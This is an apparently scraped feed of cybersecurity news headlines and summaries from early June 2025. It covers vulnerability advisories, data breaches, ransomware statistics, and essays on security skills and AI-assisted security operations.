https://dailydarkweb.net/australian-non-profit-epworth-hospital-allegedly-targeted-by-global-ransomware-group/
UK CyberEM Command to spearhead new era of armed conflict
2025-06-04T09:21:14Z | 1749028874

Government details latest initiative following announcement last week Revealing more details about the Cyber and Electromagnetic (CyberEM) military domain, the UK's Ministry of Defence (MoD) says "there are pockets of excellence" but improvements must be made to ensure the country's capability meets the needs of national defense.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/uk_cyberem_command_details/
Alleged Data Breach at Tradgo: 4.4 GB Database Reportedly for Sale Online
2025-06-04T09:18:23Z | 1749028703

An Indian platform, tradgo.in, has allegedly been compromised, with a threat actor claiming to be selling a comprehensive database of the company on an online forum. Tradgo.in appears to be a platform involved in financial transactions, Aadhaar-based services, and user data management, making it a significant entity handling sensitive personal and financial information for its […]

https://dailydarkweb.net/alleged-data-breach-at-tradgo-in-4-4-gb-database-reportedly-for-sale-online/
U.S. CISA adds Multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities catalog
2025-06-04T09:16:31Z | 1749028591

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities (KEV) catalog. This week, Qualcomm addressed the above zero-day vulnerabilities that, according to the company, have been exploited in limited, […]

https://securityaffairs.com/178610/hacking/u-s-cisa-adds-multiple-qualcomm-chipsets-flaws-to-its-known-exploited-vulnerabilities-catalog.html
StormWall Reveals India, China and US Faced Most DDoS Attacks in Q1 2025
2025-06-04T09:09:10Z | 1749028150

Shift in cyberattack focus puts APAC region under growing pressure.

https://hackread.com/stormwall-india-china-us-most-ddos-attacks-q1-2025/
Cybersecurity’s ‘rare earth’ skills: Scarce, high-value, and critical for future defense
2025-06-04T09:00:00Z | 1749027600

Rare earths have received a lot of attention this year. Like cybersecurity, they are increasingly considered critical to national security, setting up an interesting comparison of two seemingly disparate items that share several important strategic and geopolitical similarities. For example, both rare earths and cybersecurity are considered strategic assets essential for military and defense technologies. Hence both have become key investment targets for nations looking to increase self-sufficiency and reduce dependencies. There also have a common theme around supply chain vulnerabilities. Both face significant supply chain risks and concentration problems. Currently, rare earths production is dominated by China, while cybersecurity often depends on key technologies or expertise concentrated in specific countries. Both also have supply and demand concerns. Rare earths face physical scarcity and extraction challenges, while cybersecurity faces a scarcity of qualified talent and expertise, with the 2024 ISC2 Cybersecurity Workforce Study estimating a shortage of 4.76 million cybersecurity professionals. To put that staggering number into perspective: The estimated cybersecurity workforce is 5.45 million professionals; hence, according to ISC2, 46% of necessary cyber roles are unfilled. Indeed, that quantifies the rarity of cybersecurity resources. Moreover, both rare earths and cybersecurity requirecomplex technical expertise — each field requires highly specialized knowledge that takes significant time and investment from enterprises and government agencies to develop. The cybersecurity shortfall will take several generations to address. Both domains represent areas where technology capabilities, resource access, and security concerns are intersecting in our increasingly technology-dependent world. Due to these factors, there is increasing regulatory attention evolving around both as governments recognize their strategic importance. Cybersecurity’s ‘rarest earths’ Rare earths comprise about 17 natural elements, each of which has become mandatory for modern technology and warfare, such as smartphones, weapon precision guiding systems, magnets for wind farms and EV motors, plus many other use cases. But not all rare earths are equal, and there are four or five that are considered the rarest. This analogy can extend to certain cybersecurity skills, which although all critical for modern security differ in their level of rarity. The following can be considered the “rarest earths” of the cybersecurity world. Advanced threat hunting expertise Like the rarest elements, professionals who can proactively identify novel threats and adversary techniques before they cause damage are scarce and extremely valuable. Why are these skills rare? Many factors have led to this scenario: Complex skill requirements: Effective threat hunters need a unique combination of skills, including deep cyber knowledge, programming proficiency, data analysis capabilities, and the ability to understand the attacker mindset. Business and industry context: Great threat hunters also need to understand the business context of their environment to prioritize what matters — an even rarer expertise. Deep experience: Threat hunting relies heavily on pattern recognition and intuition that develops only through years of hands-on experience. Few formal training paths: Unlike other cybersecurity specialties, there are limited structured educational programs specifically for threat hunting; you must learn on the job. Quantum computing security As quantum computing risk emerges, experts who understand how to develop post-quantum cryptography are becoming the “critical elements” for future security. Many of the above points for threat hunters also apply. But let me highlight that there are very few crypto experts that are also good at driving change, and this will be required for the post-quantum remediation, which will be the equivalent of large mega transformation programs. Being able to speak technology to understand these new algorithms and protocols while at the same time speaking business language is a hard combination to find. Nation-state threat intelligence Cyber analysts who can attribute and understand sophisticated state-sponsored attacks are in extremely limited supply. This is, if you like, the “Top Gun” of the class. To get to this level then you will need: Geopolitical expertise: Effective analysts must understand global politics to properly contextualize and predict nation-state activities. Language and cultural fluency: Analysis often requires foreign languages specific to target nations. Direct exposure: Very few security professionals get hands-on experience with confirmed nation-state incidents; plus, attribution is always going to be extremely difficult. With nation-state actors increasingly targeting private organizations, this skill set will only become harder to compete for in the open talent market. A way forward As organizations and nations develop their cybersecurity strategies, the ability to identify and nurture these “rare earth” cyber skills such as advanced threat hunting, quantum security, and nation-state cyber intelligence becomes as strategically important as securing physical supply chains for critical minerals. This won’t be resolved quickly, and you will be tempted to see if AI can help fill this gap. Yes, AI can augment challenging cyber activities like advanced threat hunting, but it can’t fully replace human expertise.  Our human threat hunters remain essential for several reasons: Adversarial creativity: Sophisticated nation-state attackers constantly develop novel techniques specifically designed to evade automated detection. Human intuition is necessary to spot these shifts. Contextual understanding: Humans can understand organizational contexts, processes, and political motivations that AI currently struggles to fully comprehend. Investigative intuition: Fully trained threat hunters develop a “sixth sense” about which leads to pursue, and which unusual patterns might indicate genuine threats versus a false positive. It is hard for AI to learn this. Attribution expertise: Determining who is behind an attack, especially nation-state actors, requires judgment about motivations, techniques, and geopolitical context. Not an easy task for AI at this time. In the end the most effective approach will probably be a hybrid human-AI partnership where we combine the two strengths.   For example, AI can handle the “data rich” detection and correlation work, while our human experts evaluate findings and make final determinations. Plus, humans can adapt to evolving threats and see whether new patterns emerge. This combination leverages collective strengths. More importantly, it is a combination that we CISOs hope can be a more common asset for our defensive strategies than  we are experiencing separately today. See also: Two ways AI hype is worsening the cybersecurity skills crisis The cybersecurity skills gap reality: We need to face the challenge of emerging tech CISOs rethink hiring to emphasize skills over degrees and experience The 7 most in-demand cybersecurity skills today

https://www.csoonline.com/article/3998277/cybersecuritys-rare-earth-skills-scarce-high-value-and-critical-for-future-defense.html
K83120834: Diffie-Hellman key agreement protocol weaknesses CVE-2002-20001 & CVE-2022-40735
2025-06-04T08:47:30Z | 1749026850

Security Advisory Description The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger ...

https://my.f5.com/manage/s/article/K83120834
Dobrindt will aufrüsten gegen Cyberkriminelle
2025-06-04T08:39:58Z | 1749026398

Bundesinnenminister Alexander Dobrindt will stärker gegen Cyberkriminalität vorgehen.Max Acronym – shutterstock.com Bundesinnenminister Alexander Dobrindt (CSU) hat Maßnahmen angekündigt, um Cyberkriminalität künftig effektiver bekämpfen zu können. “Wir rüsten massiv auf: rechtlich, technisch und organisatorisch”, sagte er bei der Vorstellung des Bundeslagebilds Cybercrime 2024 des Bundeskriminalamt (BKA) . Konkret gehe es dabei um mehr Befugnisse für die Sicherheitsbehörden sowie höhere Sicherheitsstandards in Staat und Verwaltung. Bereits existierende Werkzeuge, über die das BKA schon verfüge, sollten mit Künstlicher Intelligenz (KI) weiterentwickelt werden. Auf der Seite der Angreifer werde KI unter anderem genutzt, um die Geschädigten von Phishing-Attacken leichter täuschen und damit zur Preisgabe von Zugangsdaten verleiten zu können.  Deutschland stehe stark im Fokus von Cyberkriminellen und sogenannten Hacktivisten aus dem Ausland, sagte BKA-Präsident, Holger Münch. Wie aus dem Lagebild hervorgeht, nimmt der Anteil der von Cyberkriminellen aus dem Ausland verübten bekannten Straftaten zu. Die Zahl der Fälle, bei denen die mutmaßlichen Täter im Inland verortet werden, sank leicht im Vergleich zum Vorjahr – von rund 134.000 Fällen auf rund 131.000 Fälle. Bei den aus dem Ausland heraus verübten Taten war dagegen laut BKA-Präsident Holger Münch ein Zuwachs von rund 190.000 auf knapp 202.000 Fälle zu verzeichnen.  Hohes Dunkelfeld Münch sagte, das Dunkelfeld sei in diesem Bereich sehr hoch. Er rief Geschädigte dazu auf, Cyberstraftaten anzuzeigen. Dem Lagebild zufolge etablieren sich Messenger-Dienste zunehmend als Vertriebskanal für sogenannte Cybercrime-as-a-Service-Angebote. Darunter versteht man ein Geschäftsmodell, bei dem kriminelle Dienstleistungen oder Tools über das Internet angeboten werden. Bislang wurden diese kriminellen Service-Pakete vor allem im Darknet oder in einschlägigen Foren angeboten. Ransomware bleibt die größte Bedrohung Darüber hinaus zeigt der BKA-Bericht, dass Ransomware die prägende Bedrohung im Cyberraum bleibt und weiterhin erhebliche Schäden bei Unternehmen und Privatpersonen verursacht. Deutschlandweit wurden 950 Ransomware-Angriffe angezeigt und im internationalen Vergleich ist Deutschland weiterhin das am vierthäufigsten betroffene Land. Jeden Tag werden der Polizei in Deutschland zwei bis drei schwere Ransomware-Angriffe angezeigt. Bei 72 Prozent der Ransomware-Vorfälle handelte es sich um Double-Extortion. Hierbei fordern Angreifer nicht nur eine Zahlung für die Entschlüsselung, sondern auch dafür, dass sie die zuvor gestohlenen Daten nicht veröffentlichen. Wenn Lösegeld floss, dann wurden im Mittel knapp 280.000 Dollar bezahlt. Die Hälfte der Angriffe betrafen Organisationen aus dem Handel, dem Gesundheitswesen und dem verarbeitenden Gewerbe. Insbesondere kleine und mittelständische Unternehmen sind betroffen: 80 Prozent der Attacken betrafen KMUs. Einrichtungen des Gesundheitswesens wurden ebenfalls häufig angegriffen. Neben der Gefahr für Leib und Leben sind hierbei oftmals besonders sensible Daten betroffen, berichtet das BKA. Gewerkschaft sieht Polizei nicht gut aufgestellt “Der digitale Raum wird zunehmend zum Handlungsmittelpunkt organisierter Kriminalität mit einem nicht einzuschätzenden Dunkelfeld”, sagt der stellvertretende Bundesvorsitzende der Gewerkschaft der Polizei (GdP), Alexander Poitz. Aktuell seien die Sicherheitsbehörden dieser Entwicklung nicht gewachsen. Strukturelle, personelle und technische Defizite verhinderten hier eine wirksame Kriminalitätsbekämpfung. Wenn Politik, Justiz und Polizei nicht rasch und entschlossen handelten, bestehe die Gefahr, dass man den Anschluss verliere – und dann auch die Kontrolle.  Eine positivere Bilanz zog BKA-Präsident Münch. Er erklärte: “Mit unseren international koordinierten Maßnahmen haben wir auch im vergangenen Jahr wieder gezeigt, dass wir nicht nachlassen und der gesteigerten Bedrohungslage effektive polizeiliche Maßnahmen entgegensetzen.” (dpa/jm)

https://www.csoonline.com/article/4001524/dobrindt-will-aufrusten-gegen-cyberkriminelle.html
Scaling Automation with a DDI-Enabled Network Source of Truth
2025-06-04T08:31:43Z | 1749025903

A Network Source of Truth (NSoT) is critical to sustainable network automation, especially in the context of hybrid multicloud. As DDI (DNS-DHCP-IPAM) platforms contain rich, authoritative network data, they form the ideal foundation for building a trusted NSoT. This blog explores what an NSoT is, why it matters for network automation, how to build one… The post Scaling Automation with a DDI-Enabled Network Source of Truth  appeared first on EfficientIP.

https://efficientip.com/blog/scaling-automation-with-a-ddi-enabled-network-source-of-truth/
6 ways CISOs can leverage data and AI to better secure the enterprise
2025-06-04T08:00:00Z | 1749024000

Data analytics platforms and the information they contain are among the most important corporate resources CISOs are charged with protecting, but data analytics can also be an effective tool for helping security teams identify and mitigate risks. With artificial intelligence (AI), machine learning (ML), and data science constantly advancing in their capabilities, cybersecurity chiefs can pinpoint the signs of attacks like never before. And that can help their teams initiate mitigation more quickly. “Security today is as much about smart data use as it is about traditional defenses,” says Timothy Bates, a professor of AI, cybersecurity, and other technologies at the University of Michigan College of Innovation and Technology, and former CISO at General Motors. “Data science and machine learning gave us the context and timing to act before incidents escalated.” When Bates worked for General Motors, one of the auto manufacturer’s most impactful initiatives was architecting a global security operations center (SOC) to shift from a reactive to a proactive cybersecurity posture. The company used intrusion detection tools and a security information and event management (SIEM) platform to aggregate and analyze logs across a complex, distributed infrastructure. “Through data analytics, we processed billions of log events daily, creating behavioral baselines that allowed us to detect anomalies in real-time,” Bates says. “One notable case involved identifying unusual login and command-line activity patterns within our manufacturing networks. That insight allowed us to stop a credential-stuffing attack before it reached critical systems, preventing what could have been a multimillion-dollar incident.” AI, ML, data science “are an enormous help with large data sets, which cybersecurity is packed full of,” says Nick Kathmann, CISO and CIO at governance, risk, and compliance provider LogicGate. “While core benefits are still under development, the immediate uses are already bearing fruit when combining those huge security datasets [with] risk management.” Just having security data pouring in and deploying AI and analytical tools doesn’t guarantee success, however. Enterprises and their security teams need to adhere to best practices. Here are some tips for getting the best results from leveraging data for cybersecurity. Deploy machine learning for deep pattern recognition analysis One good practice is to pair a SIEM platform with ML models to analyze patterns across billions of daily log entries, Bates says. “Build behavioral baselines across business units, then flag deviations in real-time,” he says. “Logs alone don’t tell you what’s wrong. Patterns do. Machine learning gave our SOC superpowers — turning noisy data into action-ready insight.” That deeper analysis proved vital to thwarting the credential-stuffing attack at GM, Bates notes. “The activity mimicked internal [administration] behavior — but just off enough for our system to flag it,” he says. At BairesDev, ML data analysis offers the opportunity to spot threats and unusual activity more quickly. “It uses your network traffic, user behavior, and device activity to learn about you and define what’s normal,” says Pablo Riboldi, CISO at the nearshore software development company. “Then, it flags any suspicious activity in real-time. This early detection helps security teams get ahead of insider threats, compromised accounts, or attackers moving within the network before they can do real harm.” ML tools can help identify phishing attempts, even sophisticated ones that might slip past regular filters, Riboldi says. “Over time, these systems get better,” he says. “This leads to fewer false alarms and more focus on actual threats. As not all security weaknesses are the same, machine learning can help prioritize those vulnerabilities that are a threat for the business.” Emphasize the ‘learning’ part of ML To be truly effective, models need to be retrained with new data to keep up with changing threat vectors and shifting cyber criminal behavior. “Machine learning models get smarter with your help,” Riboldi says. “Make sure to have feedback loops. Letting analysts label events and adjust settings constantly improves their accuracy. Also, the data you give them is key. It needs to be good, secure, and come from different sources, like your computers, the cloud, login systems, etc.” Building a well-integrated data lake or SIEM platform ensures that the ML models have context-rich data to work with, Riboldi says. “Don’t just monitor known bads — train your models to recognize when something’s ‘not quite right,’ even if it’s never been flagged before,” Bates says. “The most dangerous attacks don’t trip the typical wires. It’s the subtle shifts — logins at odd hours, a dev script being run from an unexpected host — that often point to breach activity.” Fuse data science into your security team At many enterprises, data science/analytics and cybersecurity teams are separate entities. But it’s a good idea to blend the SOC team with data scientists who understand the corporate infrastructure and can tune models based on overall context rather than just generic patterns, Bates says. “Cybersecurity is no longer just about firewalls and antivirus,” Bates says. “It’s a data game now. Marrying cyber expertise with data modeling gave us the precision we needed at GM to act in real-time — not post-mortem.” Organizations with data science teams that work alongside security teams “will be leaps and bounds ahead of organizations dependent on vendors to incorporate the tooling,” LogicGate’s Kathmann says. “Especially in the interconnected and vendor-agnostic world we live in now, collaboration between accountable teams is key,” Kathmann says. Having a data science team understand the end goals of the organization, and then collaborate with a security team to facilitate the collection and storage of data in a data warehouse or data lake, is the best approach, he says. Ensure top-quality data governance and integration “To get the most cybersecurity value out of data and AI capabilities, organizations should focus on ensuring data quality and integrating across data sources,” says Anay Nawathe, director at global technology research and advisory firm ISG. “Organizations should consistently cleanse, normalize, and validate data as appropriate, to increase accuracy of the findings and minimize model drift,” Nawathe says. Data integration across diverse data sources enables cybersecurity teams to receive more context around any given trend or anomaly, which leads to richer insights into complex threats, Nawathe says. Along the same lines, organizations need to integrate threat detection across the business — not just the perimeter. “Ensure your SOC integrates deeply into operational environments like operational technology networks and cloud systems,” Bates says. “Threat actors know the gaps; don’t let your factory floor or [development] pipeline be one of them. This is important because cyberattacks often hide in overlooked places, such as legacy systems, remote plants, or software development operations, Bates says. “Real-time visibility across these zones helped us shut down threats before they became disasters,” he says. Supplement security with custom-trained LLMs A large language model (LLM) that has been customized to meet the specific needs of an organization can help enhance cybersecurity. “Some organizations with sophisticated cyber teams, unique security requirements, or complex environments are increasingly using customized solutions for their security analytics, though they will likely remain in a hybrid custom vs. commercial-off-the-shelf model,” Nawathe says. Some of these custom use cases are “data/risk visualization” or risk quantification initiatives that are highly specific to the organization, Nawathe says. By custom-training an LLM and using it to process and correlate raw sensor and log data, a much cleaner and more concise data feed can be sent to mainstream security tools, says Christopher Walcutt, CSO at security services provider DirectDefense. “In addition, SOC staff can experiment in real-time, using the AI to teach them how to write better queries while providing the AI additional contextual learning,” Walcutt says. “The resulting metadata can be transformational [and] allow for more advanced automation of defensive actions. Custom-trained LLMs can power AI for a number of discrete functions, one of the best being the preprocessing of event and log data, Walcutt says. AI will be able to identify groupings of behaviors that a heuristic or rules-based machine learning or other solution will be unable to detect, he says, “and in doing so, make the fidelity of data feeding the other tools much higher.” Make full use of documentation by mining it with AI Analysis of unstructured data can also reap significant rewards for cybersecurity teams. For example, AI can have a big impact on mining company documentation, including the records used to manage and secure the organization’s systems. This includes policies, procedures, and other documents that guide the organization’s cybersecurity practices. Documentation is also a vital component of the regulatory compliance function at enterprises, providing a framework for security controls.  “Reading, summarizing, and creating documentations [has] never been easier,” LogicGate’s Kathmann says. For example, security professionals can leverage AI models to read and summarize the key differences in risk frameworks and risk analysis reports, she says. “Leaders can also create a model to search through all of an organization’s SOPs [standard operating procedures] and look for specific known or suspected bad practices, identify processes that do not follow standards, or read through vendor security documents and reports,” Kathmann says.

https://www.csoonline.com/article/3993709/6-ways-cisos-can-leverage-data-and-ai-to-better-secure-the-enterprise.html
Ukraine war spurred infosec vet Mikko Hyppönen to pivot to drones
2025-06-04T07:30:08Z | 1749022208

Why? There's a war in Europe, Finland has a belligerent neighbor, and cyber is a settled field Interview  Mikko Hyppönen has spent the last 34 years creating security software that defends against criminals and state-backed actors, but now he's moving onto drone warfare.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/mikko_hypponen_drone/
Situational Awareness for Eid-ul-Adha Holidays
2025-06-04T07:28:13Z | 1749022093

BGD e-GOV CIRT, BCC remains committed to proactively securing the nation’s cyberspace. As the extended Eid holidays approach, we anticipate an increased risk of cyberattacks, as malicious actors often exploit periods of reduced monitoring and operational oversight. Our Cyber Threat Intelligence Unit has already identified widespread malware activity, including strains such as Android.vo1d and Avalanche-Andromeda, which have compromised thousands of IP addresses nationwide. In addition... Read More

https://www.cirt.gov.bd/situational-awareness-eid-jun-2025/
Cartier disclosed a data breach following a cyber attack
2025-06-04T07:25:02Z | 1749021902

Luxury-goods conglomerate Cartier disclosed a data breach that exposed customer information after a cyberattack. Cartier has disclosed a data breach following a cyberattack that compromised its systems, exposing customers’ personal information. The incident comes amid a wave of cyberattacks targeting luxury fashion brands. The luxury firm states that the threat actors gained access to “limited […]

https://securityaffairs.com/178601/data-breach/cartier-disclosed-a-data-breach-following-a-cyber-attack.html
New Android Malware tricks users by faking Caller Identities
2025-06-04T07:05:17Z | 1749020717

A new version of the Android malware Crocodilus has introduced a deceptive feature that adds fake contacts to victims’ devices, allowing attackers to spoof calls from trusted sources. Originally detected in March 2025 by Threat Fabric researchers, Crocodilus was first seen in limited campaigns in Turkey. It initially relied on basic social engineering tactics, such as fake error messages urging users to back up their cryptocurrency wallet keys. Now, the malware has gone global. Ongoing monitoring by Threat Fabric reveals that Crocodilus is actively targeting users across all continents. Its latest versions come with significant upgrades, particularly focused on evasion […] The post New Android Malware tricks users by faking Caller Identities first appeared on Cybersafe News.

https://cybersafe.news/new-android-malware-tricks-users-by-faking-caller-identities/
Cisco research: A major infrastructure shift is underway. AI could double the strain or solve it
2025-06-04T07:02:00Z | 1749020520

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-a-major-infrastructure-shift-is-underway-ai-could-double-the-strain-or-solve-it.html
Cisco research: A major infrastructure shift is underway. AI could double the strain or solve it
2025-06-04T07:02:00Z | 1749020520

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-a-major-infrastructure-shift-is-underway-ai-could-double-the-strain-or-solve-it.html
Cisco research: A major infrastructure shift is underway. AI could double the strain or solve it
2025-06-04T07:02:00Z | 1749020520

New Cisco networking research More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-a-major-infrastructure-shift-is-underway-ai-could-double-the-strain-or-solve-it.html
Cisco research: AI transformation increases network pressure
2025-06-04T07:01:00Z | 1749020460

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-ai-transformation-increases-network-pressure.html
Cisco research: AI transformation increases network pressure
2025-06-04T07:01:00Z | 1749020460

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-ai-transformation-increases-network-pressure.html
Cisco research: AI transformation increases network pressure
2025-06-04T07:01:00Z | 1749020460

Cisco’s global study reveals a major architectural shift underway across enterprise networks.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/cisco-research-ai-transformation-increases-network-pressure.html
OPSWAT Powers Secure, Scalable S3 Access for a Major US Bank
2025-06-04T07:00:00Z | 1749020400

https://www.opswat.com/blog/opswat-powers-secure-scalable-s3-access-for-a-major-us-bank
What’s New Device Platform Intelligence on Jun 04, 2025
2025-06-04T06:38:19Z | 1749019099

Go to Device Platform Intelligence Added Platforms 25 Platforms are added Platform Name Node Type2 Node Type AB Regin HCA282DW-4 HVAC Controller HVAC IoT/OT AB Regin XCA283DW-4 Controller ICS/OT IoT/OT Automated Logic OPTIFLEX OF683-E2 BACnet Controller Building Automation System IoT/OT Carel PCO1NN0WD0 Pco Web Card ICS/OT IoT/OT Carel PCOD000WE0 Pco Web Card ICS/OT IoT/OT DENT […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-jun-4-2025/
K000151516: Python urllib vulnerability CVE-2019-9947
2025-06-04T05:29:45Z | 1749014985

Security Advisory Description An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url ...

https://my.f5.com/manage/s/article/K000151516
HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass
2025-06-04T05:23:00Z | 1749014580

Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. "These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass,...

https://thehackernews.com/2025/06/hpe-issues-security-patch-for-storeonce.html
ZDI-CAN-27273: NSF Unidata
2025-06-04T05:00:00Z | 1749013200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Fady Osman' was reported to the affected vendor on: 2025-06-04, 2 days ago. The vendor is given until 2025-10-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27260: PDFsam
2025-06-04T05:00:00Z | 1749013200

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2025-06-04, 2 days ago. The vendor is given until 2025-10-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Are Your Cloud Files Secure? Here’s How to Protect Them from Growing Threats
2025-06-04T05:00:00Z | 1749013200

In the digital collaboration rush, organizations are managing an ever-growing volume of data across multiple cloud environments, often reaching petabytes in size.

https://www.opswat.com/blog/are-your-cloud-files-secure-heres-how-to-protect-them-from-growing-threats
High Threat Security Alert (A25-06-03): Multiple Vulnerabilities in Microsoft Edge
2025-06-04T04:00:00Z | 1749009600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Visitor and Contractor Management is Critical in Busy Facilities
2025-06-04T04:00:00Z | 1749009600

Though essential to daily operations, temporary populations can become a security blind spot.

https://www.securitymagazine.com/articles/101666-why-visitor-and-contractor-management-is-critical-in-busy-facilities
‘Deliberate attack’ deletes shopping app’s AWS and GitHub resources
2025-06-04T03:58:11Z | 1749009491

CEO of India's KiranaPro, which brings convenience stores online, vows to name the perp The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/kiranapro_cyberattack_deletes_cloud_resources/
Scattered Spider: Understanding Help Desk Scams and How to Defend Your Organization
2025-06-04T03:17:07Z | 1749007027

In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone. This coverage is extremely […]

https://thecyberpost.com/news/hackers/scattered-spider-understanding-help-desk-scams-and-how-to-defend-your-organization/
EP 159: Vastaamo
2025-06-04T01:55:09Z | 1749002109

Full Transcript Joe Tidy investigates what may be the cruelest and most disturbing cyber attack in history. A breach so invasive it blurred the line between digital crime and psychological torture. This story might make your skin crawl. Get more from Joe linktr.ee/joetidy. Get the book Ctrl + Alt + Chaos: How Teenage Hackers Hijack […]

https://thecyberpost.com/cybersecurity-podcasts/darknet-diaries-podcasts/ep-159-vastaamo/
Google Chrome Multiple Vulnerabilities
2025-06-04T01:00:00Z | 1748998800

Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: CVE-2025-5419 is being exploited in the wild. A remote... Impact Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Google Chrome prior to 137.0.7151.68 (Linux) Google Chrome prior to 137.0.7151.68/.69 (Mac) Google Chrome prior to 137.0.7151.68/.69 (Windows) Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor:   Update to version 137.0.7151.68 (Linux) or later Update to version 137.0.7151.68/.69 (Mac) or later Update to version 137.0.7151.68/.69 (Windows) or later

https://www.hkcert.org/security-bulletin/google-chrome-multiple-vulnerabilities_20250604
Multiples vulnérabilités dans Microsoft Edge (04 juin 2025)
2025-06-04T00:00:00Z | 1748995200

De multiples vulnérabilités ont été découvertes dans Microsoft Edge. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur. Microsoft rappelle que la vulnérabilité CVE-2025-5419 est activement exploitée.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0474/
Vulnérabilité dans cURL (04 juin 2025)
2025-06-04T00:00:00Z | 1748995200

Une vulnérabilité a été découverte dans cURL. Elle permet à un attaquant de provoquer un déni de service à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0476/
Multiples vulnérabilités dans Python (04 juin 2025)
2025-06-04T00:00:00Z | 1748995200

De multiples vulnérabilités ont été découvertes dans Python. Elles permettent à un attaquant de provoquer une atteinte à l'intégrité des données et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0475/
Daily Dose of Dark Web Informer - 3rd of June 2025
2025-06-03T23:37:05Z | 1748993825

This daily article is intended to make it easier for those who want to stay updated with my regular Dark Web Informer and X/Twitter posts.

https://darkwebinformer.com/daily-dose-of-dark-web-informer-3rd-of-june-2025/
MetaDefender Endpoint v7.6.2505
2025-06-03T23:30:00Z | 1748993400

Elevating Device Control, 300% Faster Scans, and Real-Time Results

https://www.opswat.com/blog/metadefender-endpoint-v7-6-2505
Meta pauses mobile port tracking tech on Android after researchers cry foul
2025-06-03T23:18:04Z | 1748992684

Zuckercorp and Yandex used localhost loophole to tie browser data to app users, say boffins Security researchers say Meta and Yandex used native Android apps to listen on localhost ports, allowing them to link web browsing data to user identities and bypass typical privacy protections.

https://go.theregister.com/feed/www.theregister.com/2025/06/03/meta_pauses_android_tracking_tech/
Threat Attack Daily - 3rd of June 2025
2025-06-03T23:17:23Z | 1748992643

Threat Attack Daily - 3rd of June 2025

https://darkwebinformer.com/threat-attack-daily-3rd-of-june-2025/
‘I take pleasure in thinking I can rid society of at least some of them’: A cyber vigilante is dumping information on notorious ransomware criminals – and security experts say police will be keeping close tabs
2025-06-03T23:04:00Z | 1748991840

An anonymous whistleblower has released large amounts of data allegedly linked to the ransomware gangs

https://www.itpro.com/security/ransomware/ransomware-conti-trickbot-leaks-gangexposed
Ransomware Attack Update for the 3rd of June 2025
2025-06-03T23:03:49Z | 1748991829

Ransomware Attack Update for the 3rd of June 2025

https://darkwebinformer.com/ransomware-attack-update-for-the-2nd-of-june-2025-2/
How to Approach Security in the Era of AI Agents
2025-06-03T22:56:21Z | 1748991381

Organizations need to implement these five essential security controls to safely harness the power of autonomous AI agents while still protecting enterprise assets.

https://www.darkreading.com/cyber-risk/how-to-approach-security-era-ai-agents
You say Cozy Bear, I say Midnight Blizzard, Voodoo Bear, APT29 …
2025-06-03T22:21:05Z | 1748989265

Microsoft, CrowdStrike, and pals promise clarity on cybercrew naming, deliver alias salad instead Opinion  Microsoft and CrowdStrike made a lot of noise on Monday about teaming up with other threat-intel outfits to "bring clarity to threat-actor naming."

https://go.theregister.com/feed/www.theregister.com/2025/06/03/microsoft_crowdstrike_cybercrew_naming_clarity/
LayerX Launches ExtensionPedia
